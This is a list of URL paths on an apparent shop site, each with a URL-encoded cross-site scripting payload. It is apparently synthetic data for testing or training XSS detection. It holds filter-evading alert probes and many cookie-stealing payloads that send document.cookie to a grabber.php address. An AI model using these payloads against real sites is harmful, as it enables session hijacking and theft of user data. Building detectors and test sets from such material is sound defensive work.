/products?action1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?laptop=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/cart?username1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?password123=%3Csvg%20onload%3Dalert%281%29%3E
/cart?category1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/api?password123=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/api?electronics=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/cart?shoes=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/products?category1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/search?action1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/search?value1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/order?action1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/api?apple=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/checkout?electronics=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/login?category1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/search?password123=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/wishlist?laptop=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/search?electronics=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/wishlist?laptop=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/cart?electronics=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/wishlist?shoes=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/wishlist?electronics=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/wishlist?book=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/api?action1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/products?shoes=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/checkout?password123=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/cart?query=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/api?username1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/api?laptop=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/wishlist?book=%3Csvg%20onload%3Dalert%281%29%3E
/cart?username1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/wishlist?category1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/wishlist?banana=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/login?search_term=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/cart?query=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/search?action1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/checkout?electronics=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/search?search_term=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/wishlist?category1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/login?search_term=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/api?action1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/cart?banana=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/checkout?action1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/cart?apple=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/products?query=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/search?electronics=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/login?book=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?password123=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/wishlist?password123=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/wishlist?username1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/cart?category1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/wishlist?banana=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/cart?phone=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/api?category1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?banana=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/api?category1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/order?category1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/cart?book=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/wishlist?username1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/login?laptop=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/login?book=%3Csvg%20onload%3Dalert%281%29%3E
/checkout?action1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/checkout?category1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/order?search_term=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/checkout?book=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/api?category1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/order?book=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?password123=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/cart?book=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/cart?password123=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/products?query=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/checkout?action1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/login?shoes=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/wishlist?value1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/wishlist?action1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?action1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/checkout?category1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/search?value1=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/order?value1=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/search?password123=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/api?username1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/cart?password123=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/wishlist?phone=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?laptop=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/checkout?laptop=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/wishlist?laptop=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/checkout?query=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/search?query=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/login?username1=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/wishlist?search_term=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/login?category1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/cart?search_term=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?laptop=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/wishlist?query=%3Csvg%20onload%3Dalert%281%29%3E
/products?query=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/login?shoes=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/api?banana=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/api?apple=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/api?category1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/search?electronics=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/wishlist?username1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/api?value1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/order?apple=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?electronics=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/checkout?password123=%3Csvg%20onload%3Dalert%281%29%3E
/products?value1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/products?laptop=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/order?username1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/cart?book=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/login?apple=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/products?phone=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/api?apple=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/login?apple=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/order?banana=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/login?query=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/checkout?query=%3Csvg%20onload%3Dalert%281%29%3E
/wishlist?book=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/products?query=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/search?action1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?banana=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/order?laptop=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/products?search_term=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?book=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/checkout?shoes=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/login?phone=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?username1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/wishlist?phone=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/order?password123=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/products?value1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?laptop=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/order?apple=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/checkout?action1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/cart?password123=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/products?banana=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/products?phone=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/wishlist?query=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/cart?username1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/search?electronics=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/login?electronics=%3Csvg%20onload%3Dalert%281%29%3E
/search?apple=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/order?phone=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?username1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/checkout?laptop=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/checkout?query=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/order?username1=%3Csvg%20onload%3Dalert%281%29%3E
/order?laptop=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/login?search_term=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/order?shoes=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/cart?phone=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/cart?category1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/order?banana=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/search?action1=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/wishlist?password123=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/wishlist?apple=%3Csvg%20onload%3Dalert%281%29%3E
/checkout?category1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/api?phone=%3Csvg%20onload%3Dalert%281%29%3E
/order?category1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/search?book=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/login?password123=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/api?value1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/order?apple=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/wishlist?laptop=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/login?category1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/api?phone=%3Csvg%20onload%3Dalert%281%29%3E
/search?query=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/login?password123=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/wishlist?laptop=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/login?password123=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/checkout?query=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/search?apple=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/search?action1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/api?laptop=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/order?shoes=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/login?query=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/api?banana=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/api?query=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/order?username1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/wishlist?query=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/api?password123=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/products?banana=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/checkout?category1=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/cart?book=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/checkout?laptop=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/products?value1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/api?password123=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/login?password123=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/cart?password123=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/api?action1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/wishlist?apple=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/search?username1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/api?electronics=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/search?value1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/search?username1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/cart?query=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/products?category1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/wishlist?laptop=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/order?username1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/login?search_term=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/api?shoes=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/cart?search_term=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/checkout?value1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/cart?banana=%3Csvg%20onload%3Dalert%281%29%3E
/order?value1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/cart?query=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/search?electronics=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/order?password123=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/order?phone=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/products?category1=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/cart?phone=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?category1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/login?password123=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/search?password123=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/products?laptop=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/cart?value1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?search_term=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/cart?category1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/cart?action1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/products?category1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?value1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/order?laptop=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/wishlist?username1=%3Csvg%20onload%3Dalert%281%29%3E
/checkout?electronics=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/checkout?shoes=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?laptop=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/cart?shoes=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/order?action1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/api?query=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/wishlist?search_term=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/products?phone=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/cart?apple=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/products?apple=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/order?search_term=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/api?electronics=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/search?apple=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/api?apple=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/cart?book=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/search?username1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/login?electronics=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/api?apple=%3Csvg%20onload%3Dalert%281%29%3E
/products?category1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/order?book=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/cart?book=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/wishlist?search_term=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/order?book=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/wishlist?action1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/search?value1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/wishlist?apple=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/search?banana=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/search?electronics=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?value1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/cart?password123=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/api?electronics=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?value1=%3Csvg%20onload%3Dalert%281%29%3E
/api?phone=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/order?electronics=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/checkout?book=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/search?electronics=%3Csvg%20onload%3Dalert%281%29%3E
/products?laptop=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/wishlist?password123=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/products?value1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/login?category1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/wishlist?banana=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/wishlist?banana=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/wishlist?category1=%3Csvg%20onload%3Dalert%281%29%3E
/order?book=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/search?laptop=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/checkout?book=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/checkout?phone=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/wishlist?search_term=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/wishlist?action1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?shoes=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/login?category1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/search?username1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?value1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/api?value1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/search?electronics=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/checkout?shoes=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/checkout?book=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/api?laptop=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/wishlist?book=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/search?electronics=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/api?electronics=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/cart?value1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/wishlist?search_term=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?query=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/wishlist?query=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?banana=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/checkout?apple=%3Csvg%20onload%3Dalert%281%29%3E
/order?query=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/checkout?book=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/wishlist?search_term=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/login?username1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/api?value1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/order?shoes=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/search?password123=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/products?electronics=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/login?book=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/cart?apple=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/products?value1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/products?laptop=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/cart?laptop=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/login?laptop=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/checkout?password123=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/order?search_term=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/wishlist?value1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/order?laptop=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/order?shoes=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?banana=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/api?phone=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/search?apple=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/api?electronics=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/search?query=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/api?username1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/search?laptop=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?search_term=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
